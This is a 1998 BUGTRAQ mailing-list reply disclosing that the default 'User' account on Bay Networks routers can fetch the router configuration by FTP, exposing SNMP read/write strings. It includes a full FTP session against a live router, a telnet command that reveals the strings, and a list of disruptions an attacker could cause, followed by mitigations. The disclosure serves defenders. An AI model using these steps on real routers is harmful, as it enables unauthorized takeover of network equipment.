Everhart,Glenn From: Jason Ackley [jason@VIACCESS.NET] Sent: Sunday, May 10, 1998 11:03 AM To: BUGTRAQ@NETSPACE.ORG Subject: Re: Bay Networks Security Hole On Sun, 10 May 1998, Marty Rigaletto wrote: > vendor: bay networks > product: bay access node/wellfleet routers > on the machine is passworded by the administrator, however, the "User" > account is often left untouched. While the "User" account has restricted This is something I mentioned to them about 1yr ago, with no word / response.. Even if the box is not doing filtering and such, the 'User' Account can be used to ftp into the Bay router (they run ftp daemons), download the configuration file (yes, I have done this many times..), and then read it into their Managment program, in which you will have the snmp read/write strings to do whatever you want with! Basically if the 'User' account is open, the router can be taken over with very little effort..Once you load up the config file into the managment console, you could toggle T1s, down interfaces, reset BGP tables, capture packets.. You name it. It would be wise to make it where the 'User' account cannot ftp in, or cannot read the contents of the flash card.. Here is a sample random-bay-router-on-the-net(IP addr changed of course): llama:/usr/home/jason/doc# ftp 1.3.3.3 Connected to 1.3.3.3. 220 WfFTP server(x12.00) ready. Name (1.3.3.3:jason): User 230 User User logged in. ftp> bin 200 Type set to I. ftp> get config local: config remote: config 200 PORT command successful. 150 Image data connection for 2:config (1.3.3.3,20) (50140 bytes). 226 Binary Transfer Complete. 50140 bytes received in 2.01 seconds (24909 bytes/s) ftp> ls 200 PORT command successful. 150 ASCII data connection for 2: (1.3.3.3,0) (0 bytes). Volume - drive 2: Directory of 2: File Name Size Date Day Time ------------------------------------------------------ config.isp 45016 08/22/97 Fri. 17:05:51 startup.cfg 7472 08/24/97 Sun. 23:31:31 asnboot.exe 237212 08/24/97 Sun. 23:31:41 asndiag.exe 259268 08/24/97 Sun. 23:32:28 debug.al 12372 08/24/97 Sun. 23:33:17 ti_asn.cfg 504 08/24/97 Sun. 23:33:31 install.bat 189114 08/24/97 Sun. 23:33:41 config 50140 04/20/98 Mon. 22:08:01 4194304 bytes - Total size 3375190 bytes - Available free space 3239088 bytes - Contiguous free space 226 ASCII Transfer Complete. ftp> quit 221 Goodbye. I have no idea what the current firmware rev is, as my current duties have me away from Bay products, but in this example, the firmware was 12.00 it looks like.. (This was testing 'just now'). > All a proposed attacker would have to do is telnet to the router, login > as "User", and issue a single command, "sho snmp community". Then adjust > his or her snmp software to use that string and IP address, and b00m, > sucks to be you. As far as I knew, the User level could not see the read/write string, but I could be outdated..But as shown above, you can get the config file using a standard FTP client :) The Fix? Well, as I said , tighten down what the 'User Level' account can do, and leave things such as ftpd turned off by default. Of course, removing the 'User' account would be a good idea too, as not too many people use it and even more people are not even aware of it.. Cheers, -- Jason Ackley jason@ackley.net UNIX Systems Consultant "Learn UNIX and mingle with the gods.."